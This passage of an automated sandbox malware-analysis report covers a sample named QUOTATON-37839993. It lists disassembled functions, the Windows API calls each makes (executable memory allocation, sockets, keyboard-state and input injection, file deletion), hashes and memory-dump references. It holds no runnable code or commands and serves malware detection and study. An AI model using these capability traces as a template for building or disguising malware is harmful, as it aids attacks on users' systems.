                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                                                                      • Instruction ID: 533200cd1f57967598a77bcdf04500e6c68d63334fc06c64bc6b4824aaab8708
                                                                      • Opcode Fuzzy Hash: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                                                                      • Instruction Fuzzy Hash: 49D01734651713CFDB209F3AE81C64676E8AF05755B52D83AD48EF6691EA70C890CB90
                                                                      Function 00E41714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime__swprintf
                                                                      • String ID: %.3d$WIN_XPe
                                                                      • API String ID: 2070861257-2409531811
                                                                      • Opcode ID: a0f29e449085c41d23ea16e2db3c2a1c42fcb1180489f18ef421e68fb9c771d9
                                                                      • Instruction ID: 892da340dea8c05d1158eb3680eac01bb09542408898159e4eecbb7fc84c8073
                                                                      • Opcode Fuzzy Hash: a0f29e449085c41d23ea16e2db3c2a1c42fcb1180489f18ef421e68fb9c771d9
                                                                      • Instruction Fuzzy Hash: 48D01271845219FACF109791B88C8F9737CA70A301F202593F516B2040E22597D4EA21
                                                                      Function 00E5717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                                                                      • Instruction ID: 2f9f8de1b0bd4a851f9359497810f04133895831cecb392288e084bea5053d13
                                                                      • Opcode Fuzzy Hash: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                                                                      • Instruction Fuzzy Hash: 2FC1AE74A04216EFCB14CFA4D884EAEBBB5FF48315B109998EC95EB250D730ED85DB90
                                                                      Function 00E7E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00E7E0BE
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00E7E101
                                                                        • Part of subcall function 00E7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D7C5
                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E7E301
                                                                      • _memmove.LIBCMT ref: 00E7E314
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                      • String ID:
                                                                      • API String ID: 3659485706-0
                                                                      • Opcode ID: e9589b1759f1ec55c205dba8c725f79dca58f2cccaf728b6bc4ea1837d134111
                                                                      • Instruction ID: b9d581dc18476c2666c74b4a26d49c56ea9ab348cd75ffa54844593487ca3f56
                                                                      • Opcode Fuzzy Hash: e9589b1759f1ec55c205dba8c725f79dca58f2cccaf728b6bc4ea1837d134111
                                                                      • Instruction Fuzzy Hash: B1C15A716083019FC704DF28C48196ABBE4FF89718F14996EF899AB392D730E946CB81
                                                                      Function 00E78093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00E780C3
                                                                      • CoUninitialize.OLE32 ref: 00E780CE
                                                                        • Part of subcall function 00E5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D5D4
                                                                      • VariantInit.OLEAUT32(?), ref: 00E780D9
                                                                      • VariantClear.OLEAUT32(?), ref: 00E783AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 780911581-0
                                                                      • Opcode ID: b299597e894f1cdf81e95fc630526575baf889d792ba60adf0fdfc5a6d0b427f
                                                                      • Instruction ID: b396734fe90a4c4cc22d45bb2d7d7ca461d8892c8a3e73cf9d9f117e585c453a
                                                                      • Opcode Fuzzy Hash: b299597e894f1cdf81e95fc630526575baf889d792ba60adf0fdfc5a6d0b427f
                                                                      • Instruction Fuzzy Hash: 54A189756047019FCB04DF64C985B2AB7E4BF99324F04944DF99AAB3A2CB30EC44CB92
                                                                      Function 00E5687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: 05133c50685702dad0b4c7669be0593d207e474fd9617de9e74914d02517e585
                                                                      • Instruction ID: b291f8ddb58495f35f7f88475a306ca483b27a9223c5a103f9c82712df79417b
                                                                      • Opcode Fuzzy Hash: 05133c50685702dad0b4c7669be0593d207e474fd9617de9e74914d02517e585
                                                                      • Instruction Fuzzy Hash: 8B5191747003019EDF24AF65D891A6AB3E5AF45315FA0FC1FE996FB293DA70D8888701
                                                                      Function 00E897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(0101ECB0,?), ref: 00E89863
                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00E89896
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E89903
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: ee53e5c0065b988a2e642640645eb99086926cc51c201572516d7d859d820787
                                                                      • Instruction ID: 7c1f03b9df76e0ccb9b970204432434b5c554248369387255dc77142fc303240
                                                                      • Opcode Fuzzy Hash: ee53e5c0065b988a2e642640645eb99086926cc51c201572516d7d859d820787
                                                                      • Instruction Fuzzy Hash: B0512D35A00209AFCB14DF54C884ABE7BB5FF85364F149269F85DAB2A1D731AD81CB90
                                                                      Function 00E59A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E59AD2
                                                                      • __itow.LIBCMT ref: 00E59B03
                                                                        • Part of subcall function 00E59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E59DBE
                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E59B6C
                                                                      • __itow.LIBCMT ref: 00E59BC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: c6eb2bbc461eb239acb833538c47269e4c7335803105ac963c1e464c0585496d
                                                                      • Instruction ID: d2847e1965cdf14a68e47a3801fee60b32cf562b6ef309a0a63df2f5a45cecf5
                                                                      • Opcode Fuzzy Hash: c6eb2bbc461eb239acb833538c47269e4c7335803105ac963c1e464c0585496d
                                                                      • Instruction Fuzzy Hash: 29417F70A00208ABEF11EF54D845BEE7BF9EF48715F001459FD45B6292DB74AD88CBA1
                                                                      Function 00E769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00E769D1
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E769E1
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E76A45
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E76A51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                      • String ID:
                                                                      • API String ID: 2214342067-0
                                                                      • Opcode ID: 966d07f05f6a46b02fa691e4839802e5a1590bb00a1d973d60e808b11ff18459
                                                                      • Instruction ID: 84ddbccba59070ac17ff317b1813c7e1a56c7f9fca808bda3924f95bbb1854ac
                                                                      • Opcode Fuzzy Hash: 966d07f05f6a46b02fa691e4839802e5a1590bb00a1d973d60e808b11ff18459
                                                                      • Instruction Fuzzy Hash: 6341AE75740600AFEB64AF24CC86F6A77E8DB04B14F04E558FA59BB3D3DA709D408B91
                                                                      Function 00E7641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E8F910), ref: 00E764A7
                                                                      • _strlen.LIBCMT ref: 00E764D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: b9e846a94ef35b869cad26c3d16483a8d875144ea86632df9af00ea1f09ab5a6
                                                                      • Instruction ID: 461f13560ddc18ae12ed2d4d31b214239604fcdd33e69a67da8ba0ad879329b4
                                                                      • Opcode Fuzzy Hash: b9e846a94ef35b869cad26c3d16483a8d875144ea86632df9af00ea1f09ab5a6
                                                                      • Instruction Fuzzy Hash: 1E418F31600504AFCB14EBA8EC85EAEB7F9AF44318F149555F919B72D3EB30AD44DB50
                                                                      Function 00E6B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E6B89E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00E6B8C4
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E6B8E9
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E6B915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 3165072b2facd8a57d8849fa11cabf08b9c255c740ee61c24c7321ae4267c91d
                                                                      • Instruction ID: f59cc23f6914b1dd853bb78a2672f12d19fec340231db7970b8add64437a3029
                                                                      • Opcode Fuzzy Hash: 3165072b2facd8a57d8849fa11cabf08b9c255c740ee61c24c7321ae4267c91d
                                                                      • Instruction Fuzzy Hash: DA411879600610DFCB15EF15C485A59BBE1AF9A354F09C098EC4AAB3A3CB30FD81CB91
                                                                      Function 00E88851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E888DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: fcba26e300ba61ef53b48463c685d579ceaa828f8ada244953bf5d50d7b7d8ab
                                                                      • Instruction ID: b70e4f0d98b95a04359927e9094699939f2b7cf430cb2da2299348e00b782445
                                                                      • Opcode Fuzzy Hash: fcba26e300ba61ef53b48463c685d579ceaa828f8ada244953bf5d50d7b7d8ab
                                                                      • Instruction Fuzzy Hash: 5031E134600109AEEB28BA68CE45FB977B5EB49314FD45112FE5DF61A0CA31A9809792
                                                                      Function 00E8AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8AB60
                                                                      • GetWindowRect.USER32(?,?), ref: 00E8ABD6
                                                                      • PtInRect.USER32(?,?,00E8C014), ref: 00E8ABE6
                                                                      • MessageBeep.USER32(00000000), ref: 00E8AC57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
                                                                      • Instruction ID: 9722a2b8ab1799078f906ff0c6aa2b8c52846483f3e69d064c058bc0209d95d3
                                                                      • Opcode Fuzzy Hash: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
                                                                      • Instruction Fuzzy Hash: 4D419F31600108DFEB15EF59C884AA9BBF6FB48300F1890BAE41CAB260D731A845CB92
                                                                      Function 00E60AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E60B27
                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E60B43
                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E60BA9
                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E60BFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
                                                                      • Instruction ID: 3b4745fc2753fe274b1d60c347a8cdebfcd7acd1c6dcf2df1ff95ff16154c383
                                                                      • Opcode Fuzzy Hash: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
                                                                      • Instruction Fuzzy Hash: C2314830AC0228AEFB318B29EC05BFBBBA5EB4539DF08925AE485721D1C3758D449761
                                                                      Function 00E60C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E60C66
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E60C82
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E60CE1
                                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E60D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
                                                                      • Instruction ID: 60516eda7d0ebe501e0fb8506394fc6fe42108c2f24a71523b074ac9ac8831e7
                                                                      • Opcode Fuzzy Hash: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
                                                                      • Instruction Fuzzy Hash: 0F315530A802286FFF308B65A804BFFFBA6EB45364F04671AE485721D1C3349D49C7A1
                                                                      Function 00E361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E361FB
                                                                      • __isleadbyte_l.LIBCMT ref: 00E36229
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E36257
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E3628D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: fc12ee44c6f1bd37cd2db12747e28fd566abb29ebd14794e67390efab2059c8f
                                                                      • Instruction ID: b5d6589929babd0002fbc3c9ff5ec737ebfa95538bd9575a38821bf64c5973ef
                                                                      • Opcode Fuzzy Hash: fc12ee44c6f1bd37cd2db12747e28fd566abb29ebd14794e67390efab2059c8f
                                                                      • Instruction Fuzzy Hash: C731BC30605246BFDF218F75CC48BAB7FB9BF42314F169028E864A71A1DB31D950DB90
                                                                      Function 00E84EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00E84F02
                                                                        • Part of subcall function 00E63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E6365B
